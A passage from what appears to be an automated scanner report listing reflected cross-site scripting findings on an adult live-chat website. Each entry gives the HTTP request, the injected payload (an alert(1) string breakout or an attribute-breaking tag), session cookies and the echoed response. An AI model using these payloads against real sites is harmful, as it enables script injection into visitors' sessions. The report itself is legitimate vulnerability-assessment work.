The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7f783'-alert(1)-'ad3501b39a0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/live-sex-video/?7f783'-alert(1)-'ad3501b39a0=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:16 GMT
Connection: close
Content-Length: 25590
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/videoslibrary.aspx&he=imlive.com&ul=/live-sex-chats/live-sex-video/?7f783'-alert(1)-'ad3501b39a0=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined'
...[SNIP]...

4.530. http://imlive.com/live-sex-chats/nude-chat/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/nude-chat/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload acb7a'-alert(1)-'34ec5f17816 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/nude-chat/?acb7a'-alert(1)-'34ec5f17816=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:29 GMT
Connection: close
Content-Length: 23794
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/keyholesexplanation.aspx&he=imlive.com&ul=/live-sex-chats/nude-chat/?acb7a'-alert(1)-'34ec5f17816=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined'
...[SNIP]...

4.531. http://imlive.com/live-sex-chats/nude-chat/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /live-sex-chats/nude-chat/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f06eb"><a>2a1bdec8937 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/nude-chat/?f06eb"><a>2a1bdec8937=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:23 GMT
Connection: close
Content-Length: 23647
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/nude-chat/?f06eb"><a>2a1bdec8937=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

4.532. http://imlive.com/live-sex-chats/orgies/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/orgies/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 44239'-alert(1)-'0a5659e80e9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/orgies/?44239'-alert(1)-'0a5659e80e9=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:22:29 GMT
Connection: close
Content-Length: 49856
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/orgies/?44239'-alert(1)-'0a5659e80e9=1&qs=cat=1^roomid=14^44239'-alert(1)-'0a5659e80e9=1&qs=cat=1^roomid=14^44239'-alert(1)-'0a5659e80e9=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eb
...[SNIP]...

4.533. http://imlive.com/live-sex-chats/orgies/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /live-sex-chats/orgies/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b235"><a>bd631be4c53 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/orgies/?4b235"><a>bd631be4c53=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:22:05 GMT
Connection: close
Content-Length: 49672
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a href="/live-sex-chats/orgies/?4b235"><a>bd631be4c53=1">
...[SNIP]...

4.534. http://imlive.com/live-sex-chats/pornstars/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /live-sex-chats/pornstars/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad2c2"><a>388c8c895ab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/pornstars/?ad2c2"><a>388c8c895ab=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:36 GMT
Connection: close
Content-Length: 266390
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a href="/live-sex-chats/pornstars/?ad2c2"><a>388c8c895ab=1">
...[SNIP]...

4.535. http://imlive.com/live-sex-chats/pornstars/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/pornstars/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dd6ca'-alert(1)-'66a39635b46 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/pornstars/?dd6ca'-alert(1)-'66a39635b46=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:42 GMT
Connection: close
Content-Length: 266553
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/pornstars/?dd6ca'-alert(1)-'66a39635b46=1&qs=cat=1^roomid=249^dd6ca'-alert(1)-'66a39635b46=1&qs=cat=1^roomid=249^dd6ca'-alert(1)-'66a39635b46=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63
...[SNIP]...

4.536. http://imlive.com/live-sex-chats/role-play/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/role-play/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 27f69'-alert(1)-'603afae0b8e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/role-play/?27f69'-alert(1)-'603afae0b8e=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:22:44 GMT
Connection: close
Content-Length: 54077
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/role-play/?27f69'-alert(1)-'603afae0b8e=1&qs=cat=1^roomid=-999^27f69'-alert(1)-'603afae0b8e=1&qs=cat=1^roomid=-999^27f69'-alert(1)-'603afae0b8e=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d
...[SNIP]...

4.537. http://imlive.com/live-sex-chats/role-play/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /live-sex-chats/role-play/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43819"><a>7fb20b0957a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/role-play/?43819"><a>7fb20b0957a=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
